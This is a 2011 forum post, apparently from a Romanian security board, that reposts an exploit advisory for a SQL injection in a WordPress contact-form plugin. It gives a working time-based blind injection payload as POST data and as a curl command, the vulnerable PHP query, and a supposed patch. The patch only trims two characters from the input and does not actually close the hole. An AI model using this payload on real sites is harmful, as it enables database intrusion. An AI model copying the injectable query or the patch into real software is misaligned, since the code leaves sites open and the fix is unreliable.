LLegoLLaS Posted October 14, 2011 Report Posted October 14, 2011 WordPress Contact Form plugin <= 2.7.5 SQL Injection 2011-10-14 15:15:02# Exploit Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability# Date: 2011-10-13# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)# Software Link: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip# Version: 2.7.5 (tested)---------------PoC (POST data)---------------http://www.site.com/wp-content/plugins/contact-form-wordpress/easy-form.class.phpwpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)[E.Gcurl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://127.0.0.1/wordpress/?p=1---------------Vulnerable code---------------public function the_content($content) {global $wpdb;global $table_name;global $settings_table_name;$private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';if ($_POST['wpcf_easyform_submitted'] == 1) {$form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);---------------Patch---------------*** ./easy-form.class.php.orig 2011-10-13 19:53:05.674800956 -0400--- ./easy-form.class.php 2011-10-13 19:51:21.442799615 -0400****************** 54,61 ****$private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';if ($_POST['wpcf_easyform_submitted'] == 1) {!! $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);$continue = true;--- 54,63 ----$private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';if ($_POST['wpcf_easyform_submitted'] == 1) {! $wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];! $wpcf_easyform_formid=substr($wpcf_easyform_formid,2);!! $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);$continue = true;****************** 71,80 ****if ($continue) {//loop through the fields of this form (read from DB) and build the message here! $form_fields = $wpdb->get_results("SELECT *FROM $settings_table_name! WHERE form_id = ".$_POST['wpcf_easyform_formid']."ORDER BY position");--- 73,82 ----if ($continue) {//loop through the fields of this form (read from DB) and build the message here! $form_fields = $wpdb->get_results("SELECT *FROM $settings_table_name! WHERE form_id = ".$wpcf_easyform_formid."ORDER BY position");sursa Quote
Guest expl0iter Posted October 14, 2011 Report Posted October 14, 2011 Doh...l-au facut public.este public pe packetstorm, exploit-db 1337day/inj3ct0r Quote